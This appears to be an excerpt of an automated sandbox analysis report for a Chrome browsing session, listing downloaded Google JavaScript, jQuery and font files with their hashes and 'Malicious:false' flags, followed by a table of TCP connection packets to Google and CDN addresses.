                                                                                                                    Preview:............ .h.......(....... ..... .....@....................P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..........................................P>..P>..P>..P>..P>..P>..........................................P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (524)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):682280
                                                                                                                    Entropy (8bit):5.549668900622937
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:iOa+LzokwOO56xt5DBlDF3toBPrE0XG8EpzKv8aIrtkvuLDPxlzPW872w2vbY:iOaTnA7BlDFX0XNpvKLDYY
                                                                                                                    MD5:12F310BB15EC7927981B4A8BC629A0B6
                                                                                                                    SHA1:DA7BB7694CDAAF0A86DB0F7D780039A29EB89DC7
                                                                                                                    SHA-256:50EC1065C8CF25CCEFF7240B871CD141C1097BEF4AB395F2BD5FCEE7CA3B2AC1
                                                                                                                    SHA-512:FD4317F5049D5441CB27B86FA5EC2216373A434A4A4E05B5BF4EF35B77E02F97674429CC656820E92A659CCDF49E4890FF0156A5244DF0D43A84303F9BE26C50
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=1/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=view
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x801830, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC All Rights Reserved... Use of this source code is governed by an MIT-style license that can be. found in the LICENSE file at https://angular.dev/license.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2019 Google Inc... Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restrictio
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1239)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):129391
                                                                                                                    Entropy (8bit):5.658313993435465
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:cA3i0ALxQEyQ4mjIfjj+wcD9KeYy/KJZv58V5Vs6uZzIF4uenXlDYwFO4vUebzP6:NUsdqwUXUZv58V5Vs6+zhowpvT7C
                                                                                                                    MD5:BD27851B76DD704D42F3CE0CE7C79FD4
                                                                                                                    SHA1:D7D80893B7C2C82A8EFD5FF24D0A13BB70211A23
                                                                                                                    SHA-256:9106E31425E54823B8B82F600AC01F49963CB8F1DAE3EE3102DABE0D1BF7358D
                                                                                                                    SHA-512:BC563ACC94468B81029BFDC51AF3A7D96CD09108DA80FF5176F14D5B8A4618E90BF4419CE29DFBE1C17D7CA60CEFA3C4B598372008D0DB3A7B55516F69114C2B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=0/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=MpJwZc,n73qwf,A4UTCb,mzzZzc,CHCSlb,qAKInc,sy3i,abQiW,sy12,PVlQOd,NPKaK,sy7,BVgquf,fmklff,TGYpv,KUM7Z,qEW1W,oNFsLb,sy4f,yxTchf,sy4g,sy4h,xQtZb,yf2Bs,sy3,sya,yyxWAc,qddgKe,sy3k,SM1lmd,sy9,sy8,sy13,RRzQxe,vVEdxc,sy2p,fNFZH,syg,sy1d,Md9ENb,sy1y,sy20,sy2,syl,sym,syc,sy1z,sy2j,syq,sy4,syb,sy3j,sy1v,sy26,sy2k,syp,syn,RrXLpc,cgRV2c,sy15,sy1f,sy2i,sy2z,o1L5Wb,sy3l,X4BaPc"
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.x("MpJwZc");.._.z();.}catch(e){_._DumpException(e)}.try{._.x("n73qwf");.._.z();.}catch(e){_._DumpException(e)}.try{._.x("A4UTCb");.._.z();.}catch(e){_._DumpException(e)}.try{._.x("mzzZzc");.var YKa;_.MA=function(){_.Ll.call(this)};_.F(_.MA,_.Mn);_.MA.la=_.Mn.la;YKa=function(a){a=_.Je(a,function(c){return _.Ie(c)&&(c.id==="yDmH0d"||c.classList.contains("yDmH0d"))});return _.Ie(a)?a:null};_.NA=function(a){if(a){var c;return(c=YKa(a))!=null?c:_.Ke(a).body}a=document;var e;return(e=a.getElementById("yDmH0d"))!=null?e:a.body};_.ko(_.Zo,_.MA);._.z();.}catch(e){_._DumpException(e)}.try{._.x("CHCSlb");._.LA=function(){_.Ll.call(this)};_.F(_.LA,_.Mn);_.LA.la=_.Mn.la;_.ko(_.Yna,_.LA);._.z();.}catch(e){_._DumpException(e)}.try{._.x("qAKInc");._.U2=function(a){_.Qn.call(this,a.Na);this.B=this.getData("active").B(!1);this.C=this.S("vyyg5");this.F=_.wf(_.xf(this).Bc().cb(function(){var c=this.U();this.B?c.Sa("qs41q
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):89501
                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 23040, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):23040
                                                                                                                    Entropy (8bit):7.990788476764561
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:384:adpABC4a0HkBpR1HWtGu06B6lsoAKiwY0HcLKglV6Z+DVb35PJZDdiZeJ1vqYg:0AHa0Ezf2tZn6lsoABwTKK46ZQb3V7wD
                                                                                                                    MD5:DE69CF9E514DF447D1B0BB16F49D2457
                                                                                                                    SHA1:2AC78601179C3A63BA3F3F3081556B12DDCAF655
                                                                                                                    SHA-256:C447DD7677B419DB7B21DBDFC6277C7816A913FFDA76FD2E52702DF538DE0E49
                                                                                                                    SHA-512:4AEBB7E54D88827D4A02808F04901C0D09B756C518202B056A6C0F664948F5585221D16967F546E064187C6545ACEF15D59B68D0A7A59897BD899D3E9DDA37B1
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ.woff2
                                                                                                                    Preview:wOF2......Z........8..Y...........................B.p.`..D....e.....d.....B..6.$..v. .....E.K...5l\e.v.~S$}.".8.....5.E....s...ai`W.u..8a2C..JuBj....x.....%.u.C.......p..c...7...+.1.GS.3...F_....-..`#........]...T.....x*....&..{.....V..,..&~$D.#.P..|gzz...B.7..m.3....HH.l.....Dj.F.X.....U..+.Q...T.`...ST...1...0....io`zu@.J2....3]}0.X...,..+"...............(k.CGl......`.y.._....3.t!O.,X:t.3....lw..U../:..b.]....V.$.y....G....*.H..IN....bQ.+ \@....;...C3...c.l..i/....#..I.).Y...]...s..$K!..Tr...g%|r.D.#.Y{..R..We...X.?...*r.@...G.{..>..4^..b..,.z........T..[.ru#.7..{..G....J.3......Lz.C].of$Y2..^...>@L..P.........7..bB.....6f...ec.i..{._\...A.I.Lcy.Qm".....k.^.d.K(x7U...c.o.......}.T......iL..!.Z.......[O..*.%...*'?........^I./..;t.4%.....S...4....wY.b9.%.b...,.....tC..9.Z...V..CHnA.S.-.u$m.\....7{,..K{(.."....._...|{.VowE@E@@..Zg.....`8..b..Z...^....l+...R..%.L.b...._..E.j9\+.L.#J.........?&...&..scE..b..Jc.8...V....L 1./k.3..7w....x..-.....
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 36216, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):36216
                                                                                                                    Entropy (8bit):7.994185155139824
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:768:HjSgOUH5cnvjCxPZcF4Qfg4sm+7SG1JGfUGIU8Rdo1Sf7Yxk8QxGYj:D7/ZcOcvgVSGmfUNU8/oEDYxVQxh
                                                                                                                    MD5:7C702451150C376FF54A34249BCEB819
                                                                                                                    SHA1:3AB4DC2F57C0FD141456C1CBE24F112ADF3710E2
                                                                                                                    SHA-256:77D21084014DCB10980C296E583371786B3886F5814D8357127F36F8C6045583
                                                                                                                    SHA-512:9F1A79E93775DC5BD4AA9749387D5FA8EF55037CCDA425039FE68A5634BB682656A9ED4B6940E15226F370E0111878ECD6EC357D55C4720F97A97E58ECE78D59
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                    Preview:wOF2.......x......................................\...t...?HVAR...`?STAT..'...B/<.....H..!....0..T.6.$..V. .....:..[.aq.9.zk...R...fpY..5..n5.)$&%x...v..R.....?5A.....0W:55.{..p+\...adD.H.dh......t5..S....T..5.TT.F...lI...h3..T9M0...*c...I...Yu.#.%...o......u....&\.O.zIE..#...)o...5...7.A.@7.Q...Q..i......_5...3............cV.!.|..]6..HLa.a.........s.J...........5..VDC,g..TcY.*....n.....$/.....B..!B.......T...2...."..5..k...........H._)R.Q?.....C.[2.,p. ...[.m..@ri.....[V.U....u.....X.....-......d...YN..a..t...b|3.4.............P.Q......t.....JR.tM.y.......Xf6..5......FV..U#..O....E.A...e@.d............(...q.....Y....Og.w.6..JU...%c.Lw..D....,..|..2...?=.?....I...W.a.'|c.........9.7...@...F.r...". h[.F....Tu...5.V.Z.U..~'......,.~6.#..Pm.%W`.B..1u5..bt...I...t...6.[/....z.D.@.@H..L.E..3......Z*.@./j.D..D..%.....P.....-;kwL6'-.%.!0....VYW.~.......9...93..(..&z%.Q...5.|..`^OJ.i.+.....=..*.h6.....6X8Hm...oi.T5....P....8ehl.l.]U..V...m..IN.K.j..
                                                                                                                    No static file info
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 25, 2024 19:52:10.117131948 CET49675443192.168.2.4173.222.162.32
                                                                                                                    Nov 25, 2024 19:52:13.510474920 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:13.510524035 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:13.510648012 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:13.510837078 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:13.510852098 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:14.077013016 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:14.077064991 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:14.077151060 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:14.078833103 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:14.078852892 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.271092892 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.271337032 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:15.271357059 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.272222996 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.272278070 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:15.274645090 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:15.274699926 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.320611000 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:15.320624113 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.366914988 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:15.491801977 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.491954088 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:15.613461018 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:15.613487959 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.613703966 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:15.655206919 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:15.698015928 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:15.743328094 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:16.090848923 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:16.090903044 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:16.091006041 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:16.091041088 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:16.091062069 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:16.091070890 CET49750443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:16.091075897 CET443497502.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:16.122060061 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:16.122083902 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:16.122144938 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:16.122438908 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:16.122448921 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:17.094393969 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:17.094412088 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:17.094496012 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:17.094727039 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:17.094739914 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:17.598208904 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:17.598273039 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:17.602793932 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:17.602799892 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:17.603001118 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:17.604320049 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:17.647372961 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.623181105 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.623239040 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.623303890 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:18.624356985 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:18.624366045 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.624377012 CET49751443192.168.2.42.18.109.164
                                                                                                                    Nov 25, 2024 19:52:18.624381065 CET443497512.18.109.164192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.929269075 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.932013988 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:18.932028055 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.933074951 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.933228016 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:18.933495045 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:18.933564901 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.933667898 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:18.933676004 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:18.985990047 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.802455902 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.802500963 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.802531958 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.802556038 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.802565098 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.802588940 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.802603006 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.810862064 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.810924053 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.810935020 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.825198889 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.825262070 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.825272083 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.834887028 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.834944010 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.834954023 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.883471966 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.925564051 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.925698996 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.925755024 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.926018000 CET49753443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:19.926028967 CET44349753142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:21.889050961 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:21.889066935 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:21.889108896 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:21.889476061 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:21.889484882 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.215146065 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:23.215167999 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.215234995 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:23.215400934 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:23.215411901 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.447745085 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:23.447776079 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.447840929 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:23.448875904 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:23.448884964 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.596425056 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.596658945 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:23.596687078 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.597894907 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.597966909 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:23.600387096 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.600430965 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:23.601227045 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:23.601305962 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.601476908 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:23.601485014 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.646864891 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.395870924 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.396533966 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.396627903 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.396965027 CET44349769172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.396970987 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.397082090 CET49769443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.397454023 CET49776443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.397479057 CET44349776172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.397588015 CET49776443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.398073912 CET49776443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.398088932 CET44349776172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.928848982 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.928865910 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.929080009 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.932967901 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:24.932981968 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.958343983 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.959991932 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:24.960000038 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.960280895 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.961920977 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:24.961972952 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.962225914 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:24.979247093 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.979298115 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:24.979368925 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:25.003334045 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.207489014 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.207581997 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:25.244016886 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:25.244024992 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.244236946 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.291281939 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:25.467108965 CET49739443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:25.467184067 CET44349739216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.659776926 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.659826040 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.659857035 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.659882069 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.659909010 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:25.659931898 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.659948111 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:25.673243999 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.673294067 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:25.673300982 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.679296017 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.679347992 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:25.679353952 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.691827059 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.691888094 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:25.691894054 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.742993116 CET49773443192.168.2.4142.250.181.78
